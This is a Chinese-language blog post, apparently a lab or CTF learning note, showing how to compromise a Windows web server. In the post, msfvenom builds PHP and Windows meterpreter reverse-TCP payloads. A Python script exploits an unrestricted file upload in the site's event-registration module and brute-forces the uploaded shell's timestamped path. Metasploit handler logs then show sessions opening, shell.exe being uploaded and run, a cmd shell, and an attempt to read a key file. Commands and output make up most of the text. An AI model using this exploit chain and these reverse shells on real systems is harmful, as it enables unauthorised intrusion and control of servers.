meterpreter php payload && windows payload 学习
2021-03-17 02:23
标签:ati sage reg ali strong pst back tin module 本地kali linux 192.168.1.2 目标 windows NT 服务器192.168.1.4 目的是获取shell 首先在linux建立终端 ,msfconsole 建立php的payload,shell.php 通过脚本上传到服务器。这里python脚本在本地windows编写然后通过xshell rz 传到kali。 pxy同学提供 然后在msfconsole中use multi/handle 开启监听 use php/meterpreter/reverse-tcp, set LHOST set LPORT exploit 访问页面 然后看本地的终端已经建立了session sessions查看已有session,sessions -i 1使用第一个session 利用该php的session可以做一些基础的操作比如pwd。。 但是不能使用windows的shell,这也是为什么接下来要做windows的payload 然后新建终端,msfconsole,新建windows payload,shell.exe。注意端口要和php的不重复 然后用刚刚php的session upload 到服务器, 此时在新建的终端use multi/handle 开启监听 use windows/meterpreter/reverse-tcp,set LHOST set LPORT exploit 然后用php的session执行刚刚的windows的payload execute -f shell.exe 此时看新终端,检测到了session 然后类似于上面的php的操作步骤,可以使用这个session 同时可以使用 windows的 shell meterpreter php payload && windows payload 学习 标签:ati sage reg ali strong pst back tin module 原文地址:https://www.cnblogs.com/lqerio/p/12372212.html一 情景
二 过程
root@simpleedu:~# rz
root@simpleedu:~# msfconsole
msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30092 bytes
import requests
base_url=‘http://192.168.1.4/‘
url_for_time=‘index.php?module=eventregistration&action=eventsCalendar‘
url_for_upload=‘index.php?module=eventregistration&action=emailRegistrants&email_addresses=123456789@123.com&email_message=1&email_subject=1‘
files={‘attach‘:open(‘shell.php‘,‘rb‘)}
requests.post(base_url+url_for_upload,files=files)
print ‘upload finish‘
r=requests.get(base_url+url_for_time)
html1=r.content
#print html1
index=r.content.find(‘History.pushState‘)
if index:
time=html1[index:index+60].split(‘rel‘)[1].split(‘\‘‘)[1]
else:
print ‘something wrong‘
exit(0)
print "get time:"+ time
for i in range(int(time),int(time)-20,-1):
shell_url=base_url+‘tmp/‘+str(i)+‘_shell.php‘
r2=requests.get(shell_url)
if r2.status_code==200:
print "shell is here : "+shell_url
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.2:4444
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache
40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache
40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
meterpreter > upload shell.exe
[*] uploading : shell.exe -> shell.exe
[*] uploaded : shell.exe -> shell.exe
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache
100777/rwxrwxrwx 73802 fil 2020-02-26 17:02:33 -0500 shell.exe
40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
root@simpleedu:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.2:443
meterpreter > execute shell.exe
[-] You must specify an executable file with -f
meterpreter > execute shell.exe -f
[-] You must specify an executable file with -f
meterpreter > execute -f shell.exe
Process 2640 created.
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 640 created.
Channel 1 created.
Microsoft Windows [°汾 6.3.9600]
(c) 2013 Microsoft Corporation¡£±£´???{¡£
C:\phpStudy\WWW\tmp>cd C:
cd C:
C:\phpStudy\WWW\tmp
C:\phpStudy\WWW\tmp>cd^H^H^H
‘ ²»ˇ?²¿»??¿?®£¬?²»ˇ¿??е??
»??¦mτ¼þ¡£
C:\phpStudy\WWW\tmp>c:
c:
三. 解决meterpreter 进入 windows的shell 中文乱码:
cmd 命令 chcp 65001
C:\>type 2.key
type 2.key
¾??¡£
C:\>chcp 65001
chcp 65001
Active code page: 65001
C:\>type 2.key
type 2.key
Access is denied.
文章标题:meterpreter php payload && windows payload 学习
文章链接:http://soscw.com/index.php/essay/65104.html